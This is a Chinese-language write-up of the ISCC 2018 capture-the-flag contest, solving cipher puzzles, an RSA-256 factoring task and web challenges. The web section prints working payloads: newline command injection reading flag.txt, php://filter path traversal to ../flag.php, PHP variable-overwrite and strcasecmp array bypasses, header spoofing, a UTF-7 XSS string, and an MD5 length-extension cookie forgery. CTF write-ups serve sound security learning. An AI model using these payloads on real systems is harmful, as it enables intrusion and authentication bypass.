ISCC2018部分WriteUp

嗯,才发现ISCC比赛结束,平台也关掉了orz,附件也没下载,wp还没来得及整理,最近事情太多了orz,凑合看吧

比较坑的一点的flag格式很迷,flag{xxx}直接提交xx,不要带flag{}。划掉划掉,也有的时候提交flag{xx}

Misc

Misc1 What is that?

预览图:

很明显了,改图片高度

010Editor打开,Templates选PNG(没有的话,点此下载后导入)

保存,看到flag:

flag{_Welcome_To_ISCC_2018_}

Misc2 秘密电报

Mac解压显示出的是一堆乱码,我还以为题目就这样,琢磨了半天= =

秘密电报:
知识就是力量 ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA

两种元素,可能是 摩斯电码 也可能是 培根密码

看了一下密文长度为45,培根密码的可能性更大。

培根密码有两种方式,详见培根密码_百度百科

先用第二种解一下试试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python2
# -*- coding:utf8 -*-
__author__ = 'Cytosine'
def foo():
dic={}
s_dic="""
a AAAAA g AABBA n ABBAA t BAABA
b AAAAB h AABBB o ABBAB u-v BAABB
c AAABA i-j ABAAA p ABBBA w BABAA
d AAABB k ABAAB q ABBBB x BABAB
e AABAA l ABABA r BAAAA y BABBA
f AABAB m ABABB s BAAAB z BABBB
"""
l_dic=s_dic.split()
for idx in range(0,len(l_dic),2):
dic[l_dic[idx+1]]=l_dic[idx]
print dic
cipher='ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA'
l_cipher=[cipher[i:i+5] for i in range(0,len(cipher),5)]
print len(l_cipher),l_cipher
rst=[dic[i] for i in l_cipher]
print rst
pass
if __name__ == '__main__':
foo()
print 'ok'

output:

1
2
3
4
{'ABBAB': 'o', 'ABBAA': 'n', 'BABAA': 'w', 'BABAB': 'x', 'ABAAA': 'i-j', 'ABAAB': 'k', 'AABBB': 'h', 'AABBA': 'g', 'BAABB': 'u-v', 'BAABA': 't', 'AAABA': 'c', 'AAABB': 'd', 'ABBBB': 'q', 'ABBBA': 'p', 'ABABA': 'l', 'ABABB': 'm', 'BABBA': 'y', 'BABBB': 'z', 'AABAB': 'f', 'AABAA': 'e', 'BAAAB': 's', 'BAAAA': 'r', 'AAAAA': 'a', 'AAAAB': 'b'}
9 ['ABAAA', 'ABABB', 'ABAAA', 'ABABA', 'AABAA', 'ABAAA', 'BAABA', 'AAABA', 'AAABA']
['i-j', 'm', 'i-j', 'l', 'e', 'i-j', 't', 'c', 'c']
ok

似乎不太对。

第一种方式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/env python2
# -*- coding:utf8 -*-
__author__ = 'Cytosine'
def foo1():
dic={}
s_dic="""
a AAAAA g AABBA n ABBAA t BAABA
b AAAAB h AABBB o ABBAB u-v BAABB
c AAABA i-j ABAAA p ABBBA w BABAA
d AAABB k ABAAB q ABBBB x BABAB
e AABAA l ABABA r BAAAA y BABBA
f AABAB m ABABB s BAAAB z BABBB
"""
l_dic=s_dic.split()
for idx in range(0,len(l_dic),2):
dic[l_dic[idx+1]]=l_dic[idx]
print dic
cipher='ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA'
l_cipher=[cipher[i:i+5] for i in range(0,len(cipher),5)]
print len(l_cipher),l_cipher
rst=[dic[i] for i in l_cipher]
print rst
pass
def foo():
dic={}
s_dic="""
A aaaaa
B aaaab
C aaaba
D aaabb
E aabaa
F aabab
G aabba
H aabbb
I abaaa
J abaab
K ababa
L ababb
M abbaa
N abbab
O abbba
P abbbb
Q baaaa
R baaab
S baaba
T baabb
U babaa
V babab
W babba
X babbb
Y bbaaa
Z bbaab
"""
l_dic=s_dic.strip().split()
for idx in range(0,len(l_dic),2):
dic[l_dic[idx+1]]=l_dic[idx]
print dic
cipher='ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA'.lower()
l_cipher=[cipher[i:i+5] for i in range(0,len(cipher),5)]
print len(l_cipher),l_cipher
rst=[dic[i] for i in l_cipher]
print rst
print ''.join(rst)
pass
if __name__ == '__main__':
foo()
print 'ok'

output:

1
2
3
4
5
{'aabbb': 'H', 'aabba': 'G', 'baaab': 'R', 'baaaa': 'Q', 'bbaab': 'Z', 'bbaaa': 'Y', 'abbab': 'N', 'abbaa': 'M', 'babaa': 'U', 'babab': 'V', 'abaaa': 'I', 'abaab': 'J', 'aabab': 'F', 'aabaa': 'E', 'aaaaa': 'A', 'aaaab': 'B', 'baabb': 'T', 'baaba': 'S', 'aaaba': 'C', 'aaabb': 'D', 'abbbb': 'P', 'abbba': 'O', 'ababa': 'K', 'ababb': 'L', 'babba': 'W', 'babbb': 'X'}
9 ['abaaa', 'ababb', 'abaaa', 'ababa', 'aabaa', 'abaaa', 'baaba', 'aaaba', 'aaaba']
['I', 'L', 'I', 'K', 'E', 'I', 'S', 'C', 'C']
ILIKEISCC
ok

get flag:ILIKEISCC

Misc3 Where is the FLAG?

010Editor打开,看到Adobe Fireworks CS5

下一个Adobe Fireworks CS5,安装,打开文件:

把位图前面的小眼睛去掉,就看到二维码啦,剩下的就是拼拼图辣,拼好之后,扫二维码得到flag{a332b700-3621-11e7-a53b-6807154a58cf}

提交a332b700-3621-11e7-a53b-6807154a58cf

Misc4 一只猫的心思

手抠一个doc出来,doc文件头D0 CF 11 E0

文件内容:

1
名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通

感谢实验室学长,与佛论禅解密http://www.keyfc.net/bbs/tools/tudoucode.aspx

1
523156615245644E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C564A54544A46

hex2str:

1
R1VaREdNSlVHVTNVQ05KU0dRMlRNTkJVSVUyVEdOU0RHWTJESU9CVkdJMlRNTlpRR1UyVEtOSlRHQVpUS05DREdVWkRHTUJXR1EyVUNOQ0ZHUTNES01SVkdBMlRJTkpXRzRZREtOWlZHTTJUTU5TQ0c0NFRLTVJVR1kyRUtOQ0ZHVTNUTVFaVklFMkRRTkpYR1UzRE9NQlZHVTJUSU5KVkdNWVRNTUpWR1kzRUVOU0RHVkFUSVJCV0lNMlRNTkJVR1UyRE1RUlVJVTJEUU5KU0dNWVRPTUJVR00yVE1OQlZHWTJES01CVkdFM0VHTktCR1JBVEtOWlZHUTJFQ05CVkdVMkRHTUJUR0UzRENOSldHUTJUTU5CVkdZMkVJTlNDR1VaRElRWlZHUTJUS05DQkdVMlRLTVJUR0EyRE1OUlJHVTNESU5KVUlVMkVNTkpSR01ZREtRSlVIQTJUTU5KVUdSQVRJTVJWR0EyVElNWlFHTTRUS01CVkdFWlVJTTJF

base64:

1
GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E

b32:

1
5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D

hex2str:

1
R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==

base64:

1
GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====

base32:

1
463161395F69735F493563635F5A4F6C385F4733545030314E54

hex2str:

1
F1a9_is_I5cc_ZOl8_G3TP01NT

提交I5cc_ZOl8_G3TP01NT

Misc5 暴力XX不可取

题目: vfppjrnerpbzvat

凯撒解密,rot13时得:isccwearecoming

Misc 重重谍影

这是一道脑洞题,简单的要命。层层迷雾之后就是答案,刹那便是永恒。南无阿弥陀佛。

题目

1
2
3
4
重重谍影
这是一道脑洞题,简单的要命。层层迷雾之后就是答案,刹那便是永恒。南无阿弥陀佛。
Vm0wd2QyVkZOVWRXV0doVlYwZG9WVll3WkRSV2JGbDNXa1JTVjAxWGVGWlZNakExVjBaS2RHVkljRnBXVm5CUVZqQmtTMUl4VG5OaFJtUlhaV3RHTkZkWGRHdFRNVXB6V2toV2FsSnNjRmhhVjNoaFYxWmFjMWt6YUZSTlZtdzBWVEo0YzJGR1NuTlhiR2hYWVd0d2RsUnRlR3RqYkdSMFVteFdUbFp0ZHpCV2EyTXhVekZSZUZkc1ZsZGhlbXhoVm01d1IyTldjRVZTYlVacVZtdHdlbGRyVlRWVk1ERldZMFZ3VjJKR2NIWlpWRXBIVWpGT1dXSkhhRlJTVlhCWFZtMDFkMUl3TlhOVmJGcFlZbGhTV1ZWcVFURlRWbEY0VjIxR2FGWnNjSGxaYWs1clZqSkdjbUo2UWxwV1JWcDZWbXBHVDJNeGNFaGpSazVZVWxWd1dWWnRNVEJXTVUxNFdrVmtWbUpHV2xSWlZFNVRWVVpzYzFadVpGUmlSbHBaVkZaU1ExWlhSalpTYTJSWFlsaENVRll3V21Gak1XUnpZVWRHVTFKV2NGRldha0poV1ZkU1YxWnVTbEJXYldoVVZGUktiMDB4V25OYVJFSm9UVlpXTlZaSE5VOVdiVXB5WTBaYVdtRXhjRE5aTW5oVFZqRmFkRkpzWkU1V2JGa3dWbXhrTUdFeVJraFRiRnBYWVd4d1dGWnFUbE5YUmxsNVRWVmFiRkp0VW5wWlZWcFhZVlpLZFZGdWJGZGlXRUpJV1ZSS1QxWXhTblZWYlhoVFlYcFdWVmRYZUZOamF6RkhWMjVTYWxKWVVrOVZiVEUwVjBaYVNFNVZPVmRXYlZKS1ZWZDRhMWRzV2taWGEzaFhUVlp3V0ZwR1pFOVRSVFZZWlVkc1UyRXpRbHBXYWtvd1lURkplRmR1U2s1V1ZscHdWVzB4VTFac1duUk5WazVPVFZkU1dGZHJWbXRoYXpGeVRsVndWbFl6YUZoV2FrWmhZekpPUjJKR1pGTmxhMVYzVjJ0U1IyRXhUa2RWYmtwb1VtdEtXRmxzWkc5a2JHUllaRVprYTJKV1ducFhhMXB2Vkd4T1NHRklRbFZXTTJoTVZqQmFZVk5GTlZaa1JscFRZbFpLU0ZaSGVGWmxSbHBYVjJ0YVQxWldTbFpaYTFwM1dWWndWMXBHWkZSU2EzQXdXVEJWTVZZeVNuSlRWRUpYWWtad2NsUnJXbHBsUmxweVdrWm9hVkpzY0ZsWFYzUnJWVEZaZUZkdVVtcGxhMHB5VkZaYVMxZEdXbk5oUnpsWVVteHNNMWxyVWxkWlZscFhWbGhvVjFaRldtaFdha3BQVWxaU2MxcEhhRTVpUlc4eVZtdGFWMkV4VVhoYVJXUlVZa2Q0Y1ZWdGRIZGpSbHB4VkcwNVZsWnRVbGhXVjNSclYyeGFjMk5GYUZkaVIyaHlWbTB4UzFaV1duSlBWbkJwVW14d2IxZHNWbUZoTWs1elZtNUtWV0pHV2s5V2JHaERVMVphY1ZKdE9XcE5WbkJaVld4b2IxWXlSbk5UYldoV1lURmFhRlJVUm1GamJIQkhWR3hTVjJFelFqVldSM2hoWVRGU2RGTnJXbXBTVjFKWVZGWmFTMUpHYkhGU2JrNVlVbXR3ZVZkcldtdGhWa2w1WVVjNVYxWkZTbWhhUkVaaFZqRldjMWRzWkZoU01taFFWa1phWVdReFNuTldXR3hyVWpOU2IxVnRkSGRXYkZwMFpVaE9XbFpyY0ZsV1YzQlBWbTFXY2xkdGFGWmlXRTE0Vm0xNGExWkdXbGxqUms1U1ZURldObFZyVGxabGJFcENTbFJPUlVwVVRrVSUzRA==

base64 * n (注意url decode):

1
U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4%0AB5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z%0AiN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc%3D

urldecode(+不要de)

AES解密

与佛论禅解密http://www.keyfc.net/bbs/tools/tudoucode.aspx

Misc 凯撒十三世

凯撒十三世在学会使用键盘后,向你扔了一串字符:“ebdgc697g95w3”,猜猜它吧。

凯撒十三世 -> rot13 -> roqtp697t95j3

键盘密码,向下替换:

1
2
3
4
1 2 3 4 5 6 7 8 9 0
Q W E R T Y U I O P
A S D F G H J K L
Z X C V B N M

getflagflagyougotme

提交yougotme

Misc 有趣的ISCC

010Editor打开,拉到最后,复制,py脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#!/usr/bin/env python2
# -*- coding:utf8 -*-
__author__ = 'Cytosine'
import requests
import urllib
import base64
import hashlib
import sys
import string
import re
def foo():
s="""
26 00 23 00 39 00 32 00 3B 00 26 00 23 00 31 00
31 00 37 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 35 00
34 00 3B 00 26 00 23 00 35 00 34 00 3B 00 26 00
23 00 39 00 32 00 3B 00 26 00 23 00 31 00 31 00
37 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 35 00 34 00
3B 00 26 00 23 00 39 00 39 00 3B 00 26 00 23 00
39 00 32 00 3B 00 26 00 23 00 31 00 31 00 37 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 35 00 34 00 3B 00
26 00 23 00 34 00 39 00 3B 00 26 00 23 00 39 00
32 00 3B 00 26 00 23 00 31 00 31 00 37 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 35 00 34 00 3B 00 26 00
23 00 35 00 35 00 3B 00 26 00 23 00 39 00 32 00
3B 00 26 00 23 00 31 00 31 00 37 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 35 00 35 00 3B 00 26 00 23 00
39 00 38 00 3B 00 26 00 23 00 39 00 32 00 3B 00
26 00 23 00 31 00 31 00 37 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 35 00 34 00 3B 00 26 00 23 00 35 00
37 00 3B 00 26 00 23 00 39 00 32 00 3B 00 26 00
23 00 31 00 31 00 37 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 35 00 35 00 3B 00 26 00 23 00 35 00 31 00
3B 00 26 00 23 00 39 00 32 00 3B 00 26 00 23 00
31 00 31 00 37 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
35 00 34 00 3B 00 26 00 23 00 35 00 31 00 3B 00
26 00 23 00 39 00 32 00 3B 00 26 00 23 00 31 00
31 00 37 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 35 00
34 00 3B 00 26 00 23 00 35 00 31 00 3B 00 26 00
23 00 39 00 32 00 3B 00 26 00 23 00 31 00 31 00
37 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 35 00 30 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
39 00 32 00 3B 00 26 00 23 00 31 00 31 00 37 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 35 00 34 00 3B 00
26 00 23 00 35 00 37 00 3B 00 26 00 23 00 39 00
32 00 3B 00 26 00 23 00 31 00 31 00 37 00 3B 00
26 00 23 00 34 00 38 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 35 00 35 00 3B 00 26 00
23 00 35 00 31 00 3B 00 26 00 23 00 39 00 32 00
3B 00 26 00 23 00 31 00 31 00 37 00 3B 00 26 00
23 00 34 00 38 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 35 00 30 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 39 00 32 00 3B 00
26 00 23 00 31 00 31 00 37 00 3B 00 26 00 23 00
34 00 38 00 3B 00 26 00 23 00 34 00 38 00 3B 00
26 00 23 00 35 00 34 00 3B 00 26 00 23 00 35 00
34 00 3B 00 26 00 23 00 39 00 32 00 3B 00 26 00
23 00 31 00 31 00 37 00 3B 00 26 00 23 00 34 00
38 00 3B 00 26 00 23 00 34 00 38 00 3B 00 26 00
23 00 35 00 35 00 3B 00 26 00 23 00 35 00 33 00
3B 00 26 00 23 00 39 00 32 00 3B 00 26 00 23 00
31 00 31 00 37 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
35 00 34 00 3B 00 26 00 23 00 31 00 30 00 31 00
3B 00 26 00 23 00 39 00 32 00 3B 00 26 00 23 00
31 00 31 00 37 00 3B 00 26 00 23 00 34 00 38 00
3B 00 26 00 23 00 34 00 38 00 3B 00 26 00 23 00
35 00 35 00 3B 00 26 00 23 00 31 00 30 00 30 00
3B
"""
l=s.strip().split()
l=[i for i in l if i!='00']
l=[chr(int(i,16)) for i in l]
print l
rst=''.join(l)
print rst
l=re.findall('&#(.*?);',rst)
print l
l=[chr(int(i)) for i in l]
rst=''.join(l)
print rst
a = rst.decode('unicode-escape').encode('utf-8')
print a
pass
if __name__ == '__main__':
foo()
print 'ok'

getflagflag{iscc is fun}

提交iscc is fun

Web

Web1 比较数字大小

右键输入框,审查元素,把maxlength改成300,输入n多个9,提交

得到返回:

1
key is 768HKyu678567&*&K

提交768HKyu678567&*&K

Web2 你能跨过去吗?

1
http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=+/v+ +ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA+AC0-&_=1302746925413

+/v+明显的uft-7

utf-7在线解码

解码得:

1
+/v+ <script>alert("key:/%nsfocusXSStest%/")</script>-

得到key:/%nsfocusXSStest%/,提交,得到flag:Hell0World

Web3 一切都是套路

题目中已经提示:

好像有个文件忘记删了

那么就不客气了,扫了一下常见源码泄露,发现http://118.190.152.202:8009/index.php.txt

得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
include "flag.php";
if ($_SERVER["REQUEST_METHOD"] != "POST")
die("flag is here");
if (!isset($_POST["flag"]) )
die($_403);
foreach ($_GET as $k => $v){
$$k = $$v;
}
foreach ($_POST as $k => $v){
$$k = $v;
}
if ( $_POST["flag"] !== $flag )
die($_403);
echo "flag: ". $flag . "\n";
die($_200);
?>

变量覆盖,get过去_200=flag, 再post过去flag=a,即可getflag:ISCC{taolu2333333....}

Web5 web02

request header add client-ip: 127.0.0.1

getflag: ISCC{iscc_059eeb8c0c33eb62}

Web6 SQL注入的艺术

宽字节/扫数据库文件

数据库文件 /admins

getflag,flag忘了记是什么了orz

Web7 试试看

开局一张图,查看源代码:

1
<img src="show.php?img=1.jpg">

跳到show.php?img=1.jpg

payload:

1
view-source:http://118.190.152.202:8006/show.php?img=php://filter/resource=1.jpgresource=../flag.php

getflag:flag{1ntere5ting_PHP_Regu1ar_express1onssssss}

提交flag{1ntere5ting_PHP_Regu1ar_express1onssssss}

Web 本地的诱惑

右键查看源代码,getflagISCC{^&*(UIHKJjkadshf}

提交ISCC{^&*(UIHKJjkadshf}

Web 请ping我的ip 看你能Ping通吗?

我都过滤了,看你怎么绕。
题目地址:http://118.190.152.202:8018

命令执行

1
http://118.190.152.202:8018/?ip=www.baidu.com%0Acat%20flag.txt

getflagISCC{8a8646c7a2fce16b166fbc68ca65f9e4}

Web Please give me username and password!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
if (0 == strcasecmp($flag,$_GET['username'])){
$a = fla;
echo "very good!Username is right";
}
else{
print 'Username is not right<!--index.php.txt-->';}
}else
print 'Please give me username or password!';
if (isset($_GET['password'])){
if (is_numeric($_GET['password'])){
if (strlen($_GET['password']) < 4){
if ($_GET['password'] > 999){
$b = g;
print '<p>very good!Password is right</p>';
}else
print '<p>Password too little</p>';
}else
print '<p>Password too long</p>';
}else
print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
print $flag;
?>

payload?username[]=fla&password=9e9

getflagflag{ISCC2018_Very_GOOD!}

提交flag{ISCC2018_Very_GOOD!}

Re

Re1 RSA256

用OpenSSL算出n和e:

http://skysec.top/2017/07/25/RSA%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7/#openssl

1
2
3
4
5
6
7
8
fujian cyto$ openssl rsa -in public.key -pubin -noout -text -modulus
Public-Key: (256 bit)
Modulus:
00:d9:9e:95:22:96:a6:d9:60:df:c2:50:4a:ba:54:
5b:94:42:d6:0a:7b:9e:93:0a:ff:45:1c:78:ec:55:
d5:55:eb
Exponent: 65537 (0x10001)
Modulus=D99E952296A6D960DFC2504ABA545B9442D60A7B9E930AFF451C78EC55D555EB

上面是e,下面是n。

分解n得p和q

http://factordb.com/index.php?query=98432079271513130981267919056149161631892822707167177858831841699521774310891

前面是p,后面是q。

已知p、q、n、e求明文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/env python2
# -*- coding:utf8 -*-
import gmpy
import rsa
def foo():
p=302825536744096741518546212761194311477
q=325045504186436346209877301320131277983
n=98432079271513130981267919056149161631892822707167177858831841699521774310891
e=65537
d=int(gmpy.invert(e,(p-1)*(q-1)))
private_key=rsa.PrivateKey(n,e,d,p,q)
with open('fujian/encrypted.message1','rb') as f:
print rsa.decrypt(f.read(),private_key).decode()
with open('fujian/encrypted.message2','rb') as f:
print rsa.decrypt(f.read(),private_key).decode()
with open('fujian/encrypted.message3','rb') as f:
print rsa.decrypt(f.read(),private_key).decode()
pass
if __name__ == '__main__':
foo()
print 'ok'

output:

1
2
3
4
5
6
7
flag{3b6d3806-4b2b
-11e7-95a0-
000c29d7e93d}
ok

getflag: flag{3b6d3806-4b2b-11e7-95a0-000c29d7e93d}

Web Collide

题目源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
include "secret.php";
@$username=(string)$_POST['username'];
function enc($text){
global $key;
return md5($key.$text);
}
if(enc($username) === $_COOKIE['verify']){
if(is_numeric(strpos($username, "admin"))){
die($flag);
}
else{
die("you are not admin");
}
}
else{
setcookie("verify", enc("guest"), time()+60*60*24*7);
setcookie("len", strlen($key), time()+60*60*24*7);
}
show_source(__FILE__);

看见enc里用md5,一看又用了cookie,又那么个判断方法,哈希长度扩展攻击无疑了。

把cookie从 guest 扩展成 guest+一堆乱七八糟的东西+admin

轮子 https://github.com/iagox86/hash_extender

命令:

1
./hash_extender -f md5 -l 46 -d "guest" -s 78cfc57d983b4a17e55828c001a3e781 -a "admin"

其中:

  • -f: hash形式
  • -l: 长度
  • -d: 要扩展的原始字符串内容。
  • -s: 原始字符串的hash。
  • -a: 要扩展的字符串。

1
2
3
4
5
CytoMbp:hash_extender cyto$ ./hash_extender -f md5 -l 46 -d "guest" -s 78cfc57d983b4a17e55828c001a3e781 -a "admin"
Type: md5
Secret length: 46
New signature: 5f585093a7fe86971766c3d25c43d0eb
New string: 67756573748000000000980100000000000061646d696e

cookie中的verify改为New signature,post过去的username改为New string(用burp改hex哦)。

getflag:ISCC{MD5_1s_n0t_5afe}

窝很可爱,请给窝钱